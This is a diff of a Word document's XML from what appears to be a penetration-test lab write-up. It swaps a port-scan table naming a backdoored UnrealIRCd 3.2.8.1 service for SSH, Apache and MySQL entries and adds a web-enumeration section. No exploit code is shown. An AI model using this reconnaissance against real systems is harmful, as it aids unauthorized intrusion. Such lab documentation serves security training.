-                      <a:ext cx="5731510" cy="2448560"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="1"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="36"/>
-          <w:szCs w:val="36"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="36"/>
-          <w:szCs w:val="36"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Step 2 — </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="36"/>
-          <w:szCs w:val="36"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Port Scanning</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Command used:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:tabs>
           <w:tab w:val="left" w:pos="916"/>
           <w:tab w:val="left" w:pos="1832"/>
@@ -5690,6 +5094,158 @@
         <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79A116EC" wp14:editId="11EB888B">
+            <wp:extent cx="5731510" cy="2980690"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
+            <wp:docPr id="924079585" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="924079585" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId10"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5731510" cy="2980690"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="4472C4" w:themeColor="accent1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Port Scanning</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:kern w:val="0"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Command:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:b/>
           <w:bCs/>
           <w:kern w:val="0"/>
@@ -5721,7 +5277,6 @@
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
           <w:kern w:val="0"/>
           <w:sz w:val="27"/>
           <w:szCs w:val="27"/>
@@ -5734,20 +5289,18 @@
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
-          <w:color w:val="4472C4" w:themeColor="accent1"/>
           <w:kern w:val="0"/>
           <w:sz w:val="27"/>
           <w:szCs w:val="27"/>
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Open Ports Identified</w:t>
+        <w:t>Open Ports:</w:t>
       </w:r>
     </w:p>
     <w:tbl>
       <w:tblPr>
-        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblW w:w="3367" w:type="dxa"/>
         <w:tblCellSpacing w:w="15" w:type="dxa"/>
         <w:tblBorders>
           <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
@@ -5766,12 +5319,13 @@
         <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="575"/>
-        <w:gridCol w:w="827"/>
-        <w:gridCol w:w="1376"/>
+        <w:gridCol w:w="658"/>
+        <w:gridCol w:w="997"/>
+        <w:gridCol w:w="1712"/>
       </w:tblGrid>
       <w:tr>
         <w:trPr>
+          <w:trHeight w:val="364"/>
           <w:tblHeader/>
           <w:tblCellSpacing w:w="15" w:type="dxa"/>
         </w:trPr>
@@ -5874,6 +5428,7 @@
       </w:tr>
       <w:tr>
         <w:trPr>
+          <w:trHeight w:val="377"/>
           <w:tblCellSpacing w:w="15" w:type="dxa"/>
         </w:trPr>
         <w:tc>
@@ -5899,7 +5454,7 @@
                 <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
                 <w14:ligatures w14:val="none"/>
               </w:rPr>
-              <w:t>6667</w:t>
+              <w:t>22</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5926,70 +5481,7 @@
                 <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
                 <w14:ligatures w14:val="none"/>
               </w:rPr>
-              <w:t>IRC</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-            <w:vAlign w:val="center"/>
-            <w:hideMark/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:b/>
-                <w:bCs/>
-                <w:kern w:val="0"/>
-                <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-                <w14:ligatures w14:val="none"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:b/>
-                <w:bCs/>
-                <w:kern w:val="0"/>
-                <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-                <w14:ligatures w14:val="none"/>
-              </w:rPr>
-              <w:t>UnrealIRCd</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:trPr>
-          <w:tblCellSpacing w:w="15" w:type="dxa"/>
-        </w:trPr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-            <w:vAlign w:val="center"/>
-            <w:hideMark/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:kern w:val="0"/>
-                <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-                <w14:ligatures w14:val="none"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:kern w:val="0"/>
-                <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-                <w14:ligatures w14:val="none"/>
-              </w:rPr>
-              <w:t>6697</w:t>
+              <w:t>SSH</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -6016,44 +5508,14 @@
                 <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
                 <w14:ligatures w14:val="none"/>
               </w:rPr>
-              <w:t>IRC</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="0" w:type="auto"/>
-            <w:vAlign w:val="center"/>
-            <w:hideMark/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:b/>
-                <w:bCs/>
-                <w:kern w:val="0"/>
-                <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-                <w14:ligatures w14:val="none"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:b/>
-                <w:bCs/>
-                <w:kern w:val="0"/>
-                <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-                <w14:ligatures w14:val="none"/>
-              </w:rPr>
-              <w:t>UnrealIRCd</w:t>
+              <w:t>OpenSSH 7.3</w:t>
             </w:r>
           </w:p>
         </w:tc>
       </w:tr>
       <w:tr>
         <w:trPr>
+          <w:trHeight w:val="364"/>
           <w:tblCellSpacing w:w="15" w:type="dxa"/>
         </w:trPr>
         <w:tc>
@@ -6079,7 +5541,7 @@
                 <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
                 <w14:ligatures w14:val="none"/>
               </w:rPr>
-              <w:t>8067</w:t>
+              <w:t>80</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -6106,7 +5568,7 @@
                 <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
                 <w14:ligatures w14:val="none"/>
               </w:rPr>
-              <w:t>IRC</w:t>
+              <w:t>HTTP</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -6121,8 +5583,6 @@
               <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:b/>
-                <w:bCs/>
                 <w:kern w:val="0"/>
                 <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
                 <w14:ligatures w14:val="none"/>
@@ -6131,13 +5591,98 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:b/>
-                <w:bCs/>
                 <w:kern w:val="0"/>
                 <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
                 <w14:ligatures w14:val="none"/>
               </w:rPr>
-              <w:t>UnrealIRCd</w:t>
+              <w:t>Apache 2.4.18</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="364"/>
+          <w:tblCellSpacing w:w="15" w:type="dxa"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:kern w:val="0"/>
+                <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:kern w:val="0"/>
+                <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+              <w:t>3306</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:kern w:val="0"/>
+                <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:kern w:val="0"/>
+                <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+              <w:t>MySQL</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="0" w:type="auto"/>
+            <w:vAlign w:val="center"/>
+            <w:hideMark/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:kern w:val="0"/>
+                <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:kern w:val="0"/>
+                <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+                <w14:ligatures w14:val="none"/>
+              </w:rPr>
+              <w:t>Unauthorized</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -6145,7 +5690,7 @@
     </w:tbl>
     <w:p>
       <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:kern w:val="0"/>
@@ -6155,53 +5700,14 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">This indicates the system is running an </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>IRC service</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>, which is often a target for known exploits.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
           <w:noProof/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17F983ED" wp14:editId="49A19039">
-            <wp:extent cx="5731510" cy="1343025"/>
-            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
-            <wp:docPr id="1374293567" name="Picture 1"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A47455F" wp14:editId="30CF9DBD">
+            <wp:extent cx="5731510" cy="3549650"/>
+            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
+            <wp:docPr id="608413368" name="Picture 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -6209,7 +5715,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="1374293567" name=""/>
+                    <pic:cNvPr id="608413368" name=""/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
@@ -6221,7 +5727,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5731510" cy="1343025"/>
+                      <a:ext cx="5731510" cy="3549650"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -6236,27 +5742,16 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:outlineLvl w:val="0"/>
+        <w:outlineLvl w:val="1"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
           <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
@@ -6267,13 +5762,13 @@
           <w:b/>
           <w:bCs/>
           <w:color w:val="4472C4" w:themeColor="accent1"/>
-          <w:kern w:val="36"/>
-          <w:sz w:val="48"/>
-          <w:szCs w:val="48"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>Vulnerability Analysis</w:t>
+          <w:kern w:val="0"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>Web Enumeration</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6293,232 +5788,7 @@
           <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
-        <w:t>During research, the IRC service was identified as:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>UnrealIRCd 3.2.8.1 (Backdoored version)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
